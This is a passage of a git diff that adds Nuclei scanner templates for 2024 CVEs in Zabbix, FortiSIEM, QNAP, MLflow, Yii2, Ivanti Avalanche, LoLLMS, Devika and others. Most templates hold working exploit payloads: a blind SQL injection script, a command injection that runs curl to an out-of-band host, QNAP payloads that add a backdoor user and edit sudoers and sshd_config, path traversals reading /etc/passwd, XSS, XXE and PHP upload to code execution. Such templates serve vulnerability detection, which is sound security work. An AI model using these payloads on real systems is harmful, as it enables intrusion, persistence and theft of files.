tags. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-21520 + - https://security.snyk.io/vuln/SNYK-PYTHON-DJANGORESTFRAMEWORK-7252137 + - https://github.com/encode/django-rest-framework/commit/3b41f0124194430da957b119712978fa2266b642 + - https://github.com/encode/django-rest-framework/compare/3.15.1...3.15.2 + - https://github.com/encode/django-rest-framework/pull/9435 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-21520 + cwe-id: CWE-79 + epss-score: 0.00045 + epss-percentile: 0.16371 + tags: cve,cve2024,xss,django + +http: + - raw: + - | + GET {{BaseURL}}?{{param_name}}=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "," + + - type: word + part: body + words: + - '"OK"' + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2024-22120.yaml b/poc/cve/CVE-2024-22120.yaml new file mode 100644 index 0000000000..b21744ef6d --- /dev/null +++ b/poc/cve/CVE-2024-22120.yaml @@ -0,0 +1,53 @@ +id: cve-2024-22120 + +info: + name: Zabbix Server - Authenticated Time-Based Blind SQL injection + author: CodeStuffBreakThings + description: Zabbix server can perform command execution for configured scripts. After a command is executed, an audit entry is added to "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability. + severity: critical + remediation: Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2 + reference: + - https://support.zabbix.com/browse/ZBX-24505#/ + - https://github.com/W01fh4cker/CVE-2024-22120-RCE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-22120 + tags: zabbix,sqli,cve,cve2024,cve-2024-22120 + +variables: + HOST: "{{Host}}" + PORT: "{{Port}}" + SID: "{{SID}}" + HOSTID: "{{HOSTID}}" + +code: + - engine: + - py + - python3 + source: | + import os, struct, socket + from datetime import datetime + hostname=os.getenv('HOST') + port=int(os.getenv('PORT')) + sid=os.getenv('SID') + hostid=os.getenv('HOSTID') + zbx_header = "ZBXD\x01".encode() + message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}" + message_length = struct.pack('= 10 and zbx_header in response: + print("Vulnerable to CVE-2024-22120") + + matchers: + - type: word + words: + - "Vulnerable to CVE-2024-22120" diff --git a/poc/cve/CVE-2024-23108.yaml b/poc/cve/CVE-2024-23108.yaml new file mode 100644 index 0000000000..5d319621ab --- /dev/null +++ b/poc/cve/CVE-2024-23108.yaml @@ -0,0 +1,50 @@ +id: CVE-2024-23108 + +info: + name: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection - CVE-2024-23108 + author: thacien + severity: critical + description: An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1, 7.0.0 through 7.0.2, 6.7.0 through 6.7.8, 6.6.0 through 6.6.3, 6.5.0 through 6.5.2, and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests. + impact: Successful exploitation of this vulnerability could allow an unauthenticated attacker to execute arbitrary code on the affected system. + remediation: upgrade to FortiSIEM version >=6.4.4, >=6.5.3, >=6.6.4, >=6.7.9, >=7.0.3, >=7.1.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-23108 + - https://github.com/horizon3ai/CVE-2024-23108 + - https://www.horizon3.ai/attack-research/disclosures/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive + - https://www.fortiguard.com/psirt/FG-IR-23-130 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-23108 + cwe-id: CWE-78 + epss-score: 0.00078 + cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* +metadata: + verified: false + max-request: 1 + vendor: fortinet + product: fortisiem + tags: CVE-2024-23108,fortisiem,network,cve,fortinet,rce,tcp,unauth +variables: + # generate the payload to send a curl request to an OOB server + - exploit: '\n 127.0.0.1\n /test; curl -k "{{interactsh_url}}";\n\n' + - payload: '{{51000000 + hex_encode(len("{{exploit}}")) + 0000006f421e4000000000}}' +tcp: + - host: + - "tls://{{Hostname}}" + port: 7900 + # send payload with exploit + inputs: + - data: '{{hex_decode("{{payload}}") + exploit}}' + read-size: 2048 + matchers-condition: and + # if oob server receives and http request + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - type: status + part: interactsh_request + status: + - 200 diff --git a/poc/cve/CVE-2024-27130.yaml b/poc/cve/CVE-2024-27130.yaml new file mode 100644 index 0000000000..b63847d769 --- /dev/null +++ b/poc/cve/CVE-2024-27130.yaml @@ -0,0 +1,49 @@ +id: CVE-2024-27130 + +info: + name: Remote Code Execution in NAS File Management in QNAP QuTSCloud c5.1.7.2739 build 20240419 + author: colcs25 + severity: high + description: This template checks for Remote Code Execution (RCE) vulnerability via Buffer Overflow in NAS file management via the ssid parameter. + command -> nuclei -t CVE-2024-27130.yaml -u (target URL) -var ssid=(ssid value) + tags: rce, cve + remediation: Fixed in QTS 5.1.7.2770 build 20240520 + reference: + - https://github.com/watchtowrlabs/CVE-2024-27130 + - https://labs.watchtowr.com/qnap-qts-qnapping-at-the-wheel-cve-2024-27130-and-friends/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-27130 + classification: + cve-id: CVE-2024-27130 + cve-Base-Score: 7.2 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L + +requests: + - raw: + - | + POST /cgi-bin/filemanager/share.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Connection: close + + ssid={{ssid}}&func=get_file_size&total=1&path=/&name={{payload}} + attack: pitchfork + payloads: + payload: + - "/../../../../usr/local/bin/useradd -p '$(openssl passwd -6 password)' watchtowr #" + - "/bin/sed -i -e 's/AllowUsers /AllowUsers watchtowr /' /etc/config/ssh/sshd_config #" + - "/../../../../bin/echo watchtowr ALL=\\(ALL\\) ALL >> /usr/etc/sudoers #" + - "/../../../../usr/bin/killall -SIGHUP sshd #" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "HTTP/1.1 200 OK" + part: header + extractors: + - type: regex + part: body + regex: + - "watchtowr" diff --git a/poc/cve/CVE-2024-2928.yaml b/poc/cve/CVE-2024-2928.yaml new file mode 100644 index 0000000000..919025c5b7 --- /dev/null +++ b/poc/cve/CVE-2024-2928.yaml @@ -0,0 +1,69 @@ +id: CVE-2024-2928 + +info: + name: MLflow - LFI Exploitation + author: jyjyjy25, gy741, oriing, ANseunghyeon, woo4826 + severity: high + description: | + This template detects Local File Read (LFI) vulnerabilities in MLflow due to URI fragment parsing confusion. + impact: | + Successful exploitation could allow an attacker to read arbitrary files such as /etc/passwd in the local file system. + remediation: | + Upgrade MLflow to version up to 2.11.3. + reference: + - https://huntr.com/bounties/19bf02d7-6393-4a95-b9d0-d6d4d2d8c298 + - https://nvd.nist.gov/vuln/detail/CVE-2024-2928 + tags: mlflow,lfi,cve,cve2024 + +http: + - raw: + - | + POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + {"name": "poc", "artifact_location": "http:\/\/\/#\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/"} + + extractors: + - type: json + part: experiment_id + + - raw: + - | + POST /api/2.0/mlflow/runs/create HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + {"experiment_id": "{{experiment_id}}"} + + extractors: + - type: json + part: run.info.run_uuid + + - raw: + - | + POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + {"name": "poc"} + + - raw: + - | + POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + {"name": "poc", "run_id": "{{run_id}}", "source": "file:///etc/"} + + - raw: + - | + GET /model-versions/get-artifact?path=passwd&name=poc&version=1 HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + + matchers: + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/poc/cve/CVE-2024-32877.yaml b/poc/cve/CVE-2024-32877.yaml new file mode 100644 index 0000000000..2e2b39f64b --- /dev/null +++ b/poc/cve/CVE-2024-32877.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-32877 + +info: + name: Yii2 2.0.49.3 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Yii 2 is a PHP application framework. During internal penetration testing of a product based on Yii2, users discovered a Cross-site Scripting (XSS) vulnerability within the framework itself. This issue is relevant for the latest version of Yii2 (2.0.49.3). This issue lies in the mechanism for displaying function argument values in the stack trace. The vulnerability manifests when an argument's value exceeds 32 characters. For convenience, argument values exceeding this limit are truncated and displayed with an added "...". The full argument value becomes visible when hovering over it with the mouse, as it is displayed in the title attribute of a span tag. However, the use of a double quote (") allows an attacker to break out of the title attribute's value context and inject their own attributes into the span tag, including malicious JavaScript code through event handlers such as onmousemove. This vulnerability allows an attacker to execute arbitrary JavaScript code in the security context of the victim's site via a specially crafted link. + reference: + - https://github.com/yiisoft/yii2/security/advisories/GHSA-qg5r-95m4-mjgj + - https://nvd.nist.gov/vuln/detail/CVE-2024-32877 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Yii Framework" + tags: cve,cve2024,yiisoft,yii2,xss + +http: + - method: GET + path: + - "{{BaseURL}}/about/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%22%20onmousemove=alert(1)%20style=%22width:%20100000px;%20height:%20100000px;%20position:%20absolute;%20top:%20-10000px;%20left:%200;%22" + - "{{BaseURL}}/site/about/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%22%20onmousemove=alert(1)%20style=%22width:%20100000px;%20height:%20100000px;%20position:%20absolute;%20top:%20-10000px;%20left:%200;%22" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmousemove=alert(1)' + - 'Yii' + condition: and + case-insensitive: true + + - type: word + part: header + words: + - "text/html" diff --git a/poc/cve/CVE-2024-38653.yaml b/poc/cve/CVE-2024-38653.yaml new file mode 100644 index 0000000000..111513bd22 --- /dev/null +++ b/poc/cve/CVE-2024-38653.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-38653 + +info: + name: Ivanti Avalanche SmartDeviceServer - XML External Entity + author: DhiyaneshDK + severity: high + description: | + XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server. + reference: + - https://github.com/D4mianWayne/POCs/tree/main/CVE%202024-38653 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-38653 + cwe-id: CWE-611 + epss-score: 0.00697 + epss-percentile: 0.80607 + cpe: cpe:2.3:a:ivanti:avalanche:6.3.1:*:*:*:premise:*:*:* + metadata: + vendor: ivanti + product: avalanche + tags: cve,cve2024,intrusive,ivanti,avalanche,xxe + +http: + - raw: + - | + PUT /mdm/checkin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + + %asd; + %c; + ]> + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" diff --git a/poc/cve/CVE-2024-41468.yaml b/poc/cve/CVE-2024-41468.yaml new file mode 100644 index 0000000000..d611112202 --- /dev/null +++ b/poc/cve/CVE-2024-41468.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-41468 + +info: + name: Tenda FH1201 v1.2.0.14 - Command Injection + author: s4e-io + severity: critical + description: | + Tenda FH1201 v1.2.0.14 was discovered to contain a command injection vulnerability via the cmdinput parameter at /goform/exeCommand + reference: + - https://github.com/iotresearch/iot-vuln/blob/main/Tenda/FH1201/exeCommand/README.md + - https://www.4awl.net/10184.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-41468 + cwe-id: CWE-78,CWE-94 + epss-score: 0.00065 + epss-percentile: 0.29645 + cpe: cpe:2.3:o:tendacn:fh1201_firmware:1.2.0.14:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: tendacn + product: fh1201_firmware + tags: cve,cve2024,tenda,rce + +http: + - raw: + - | + POST /goform/exeCommand HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cmdinput=ifconfig%3B + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "inet", "addr", "Ethernet")' + - 'status_code == 200' + condition: and diff --git a/poc/cve/CVE-2024-42640.yaml b/poc/cve/CVE-2024-42640.yaml new file mode 100644 index 0000000000..b7c6e9a69c --- /dev/null +++ b/poc/cve/CVE-2024-42640.yaml @@ -0,0 +1,69 @@ +id: CVE-2024-42640 + +info: + name: Angular-Base64-Upload - Remote Code Execution + author: s4e-io + severity: critical + description: | + angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + reference: + - https://github.com/rvizx/CVE-2024-42640 + - https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html + - https://github.com/adonespitogo/angular-base64-upload + - https://nvd.nist.gov/vuln/detail/CVE-2024-42640 + classification: + cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H + cvss-score: 10 + cve-id: CVE-2024-42640 + cwe-id: CWE-94 + epss-score: 0.00043 + epss-percentile: 0.09695 + tags: cve,cve2024,angular,rce + +variables: + filename: "{{to_lower(rand_text_alpha(12))}}" + num: "{{rand_int(1000000,9999999)}}" + +flow: http(1) && http(2) && http(3) && http(4) + +http: + - raw: + - | + POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"} + + - raw: + - | + POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"} + + matchers: + - type: dsl + dsl: + - 'contains(body_1,"uploads/{{filename}}.php") || contains(body_2,"uploads/{{filename}}.php") ' + - 'status_code_1 == 200 || status_code_2 == 200' + condition: and + internal: true + + - raw: + - | + GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + - raw: + - | + GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")' + - 'status_code_3 == 200 || status_code_4 == 200' + condition: and diff --git a/poc/cve/CVE-2024-4320.yaml b/poc/cve/CVE-2024-4320.yaml new file mode 100644 index 0000000000..b57e49ab19 --- /dev/null +++ b/poc/cve/CVE-2024-4320.yaml @@ -0,0 +1,53 @@ +id: CVE-2024-4320 +info: + name: CVE-2024-4320 + author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723 + severity: Critical + description: | + Remote Code Execution due to LFI in '/install_extension' in parisneo/lollms-webui + impact: | + Remote Code Execution. lollmscan be exposed to external endpoint or the ui when binding to 0.0.0.0 or in headless mode. (can be set via official docs here) thus no user interactions are required. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-4320 + - https://huntr.com/bounties/d6564f04-0f59-4686-beb2-11659342279b + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-4320 + tags: cve,cve2024, RCE, LFI + +requests: + - raw: + - | + POST /uploadfile/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW + + ------WebKitFormBoundary7MA4YWxkTrZu0gW + Content-Disposition: form-data; name="file"; filename="__init__.py" + Content-Type: text/x-python + + print("Exploited") + ------WebKitFormBoundary7MA4YWxkTrZu0gW-- + + - | + POST /install_extension HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "name": "../../../../../../../../../../../path/to/uploads/__init__.py" + } + + - | + GET /uploads/__init__.py HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Exploited" diff --git a/poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml b/poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml new file mode 100644 index 0000000000..7d803f7aea --- /dev/null +++ b/poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9 + +info: + name: > + IMPress for IDX Broker <= 3.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The IMPress for IDX Broker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dfc5868-1215-465f-8a4e-3703c18d7dca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-44047 + metadata: + fofa-query: "wp-content/plugins/idx-broker-platinum/" + google-query: inurl:"/wp-content/plugins/idx-broker-platinum/" + shodan-query: 'vuln:CVE-2024-44047' + tags: cve,wordpress,wp-plugin,idx-broker-platinum,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/idx-broker-platinum/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "idx-broker-platinum" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45309.yaml b/poc/cve/CVE-2024-45309.yaml new file mode 100644 index 0000000000..37caefa815 --- /dev/null +++ b/poc/cve/CVE-2024-45309.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-45309 + +info: + name: onedev < 11.0.9 - Arbitrary File Read + author: isacaya + severity: high + description: | + Files on the host computer can be accessed by directory traversal. + impact: | + An attacker would be able to view the contents of a file on the computer. + remediation: | + Update to version 11.0.9. + reference: + - https://x.com/Siebene7/status/1848727539046617324 + - https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489 + classification: + cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N + cvss-score: 8.7 + cve-id: CVE-2024-45309 + cwe-id: CWE-200 + metadata: + vendor: onedev + product: onedev + framework: java + tags: cve,cve2024,lfi,onedev +variables: + projectName: + +http: + - method: GET + path: + - "{{BaseURL}}/{{projectName}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}}" + + payloads: + path: + - /etc/passwd + - /windows/win.ini + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2024-4841.yaml b/poc/cve/CVE-2024-4841.yaml new file mode 100644 index 0000000000..92895bd59c --- /dev/null +++ b/poc/cve/CVE-2024-4841.yaml @@ -0,0 +1,60 @@ +id: CVE-2024-4841 + +info: + name: LoLLMS WebUI - Subfolder prediction via Path Traversal + author: s4e-io + severity: medium + description: | + A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest. By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint. + reference: + - https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602 + - https://nvd.nist.gov/vuln/detail/CVE-2024-4841 + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4 + cve-id: CVE-2024-4841 + cwe-id: CWE-29 + epss-score: 0.00043 + epss-percentile: 0.09834 + metadata: + verified: true + max-request: 1 + fofa-query: "LoLLMS WebUI - Welcome" + tags: cve,cve2024,lollms-webui +variables: + folder: "{{to_upper(rand_text_alpha(10))}}" + +flow: http(1) && http(2) + +http: + - raw: + - | + POST /add_reference_to_local_model HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"path":"\\Users"} + + matchers: + - type: dsl + dsl: + - 'contains(body, "{\"status\":true}")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and + + - raw: + - | + POST /add_reference_to_local_model HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"path":"\\{{folder}}"} + + matchers: + - type: dsl + dsl: + - 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and diff --git a/poc/cve/CVE-2024-5334.yaml b/poc/cve/CVE-2024-5334.yaml new file mode 100644 index 0000000000..10fa822e0f --- /dev/null +++ b/poc/cve/CVE-2024-5334.yaml @@ -0,0 +1,48 @@ +id: CVE-2024-5334 + +info: + name: Devika - Local File Inclusion + author: nechyo,nukunga,harksu,olfloralo,gy741 + severity: high + description: Devika is vulnerable to local file inclusion. + impact: | + Successful exploitation could lead to unauthorized access to sensitive files and data. + remediation: | + Ensure input validation is implemented to prevent malicious file inclusions and use whitelists for allowed file paths. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5334 + - https://huntr.com/bounties/7eec128b-1bf5-4922-a95c-551ad3695cf6 + - https://github.com/stitionai/devika/commit/6acce21fb08c3d1123ef05df6a33912bf0ee77c2 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-5334 + cwe-id: CWE-73 + epss-score: 0.00043 + epss-percentile: 0.09666 + metadata: + max-request: 1 + tags: cve,cve2024,devika,lfi,unauth + +http: + - raw: + - | + GET /api/get-browser-snapshot?snapshot_path=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Content-Disposition: attachment; filename=passwd" + - "Content-Type: application/octet-stream" + + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2024-6049.yaml b/poc/cve/CVE-2024-6049.yaml new file mode 100644 index 0000000000..0230513416 --- /dev/null +++ b/poc/cve/CVE-2024-6049.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-6049 + +info: + name: Lawo AG - vsm LTC Time Sync (vTimeSync) - Path Traversal + author: s4e-io + severity: high + description: | + The web server of Lawo AG vsm LTC Time Sync (vTimeSync) is affected by a "..." (triple dot) path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker could download arbitrary files from the operating system. As a limitation, the exploitation is only possible if the requested file has some file extension, e. g. .exe or .txt. + reference: + - https://lawo.com/lawo-downloads/ + - https://r.sec-consult.com/lawo + - https://packetstormsecurity.com/files/182347/Lawo-AG-vsm-LTC-Time-Sync-Path-Traversal.html + - https://sec-consult.com/vulnerability-lab/advisory/unauthenticated-path-traversal-vulnerability-in-lawo-ag-vsm-ltc-time-sync-vtimesync/ + - https://nvd.nist.gov/vuln/detail/cve-2024-6049 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-6049 + cwe-id: CWE-32 + epss-score: 0.00043 + epss-percentile: 0.09833 + metadata: + verified: true + max-request: 2 + tags: cve,cve2024,lawo,lfi,seclists,packetstorm + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname} + + host-redirects: true + matchers: + - type: word + part: body + words: + - "vTimeSync" + internal: true + case-insensitive: true + + - raw: + - | + GET /../../../../../../../../../Windows/win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"bit app support","fonts","extensions")' + - 'status_code == 200' + condition: and diff --git a/poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml b/poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml new file mode 100644 index 0000000000..a940612774 --- /dev/null +++ b/poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937 + +info: + name: > + FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the "fileorganizer_ajax_handler" function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: The FileOrganizer Pro plugin must be installed and active to allow Subscriber+ users to upload files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2024-7985 + metadata: + fofa-query: "wp-content/plugins/fileorganizer/" + google-query: inurl:"/wp-content/plugins/fileorganizer/" + shodan-query: 'vuln:CVE-2024-7985' + tags: cve,wordpress,wp-plugin,fileorganizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fileorganizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fileorganizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9162.yaml b/poc/cve/CVE-2024-9162.yaml new file mode 100644 index 0000000000..57a2c6b7cb --- /dev/null +++ b/poc/cve/CVE-2024-9162.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9162 + +info: + name: > + All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection + author: topscoder + severity: low + description: > + The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9162 + metadata: + fofa-query: "wp-content/plugins/all-in-one-wp-migration/" + google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" + shodan-query: 'vuln:CVE-2024-9162' + tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-in-one-wp-migration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.86') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9264.yaml 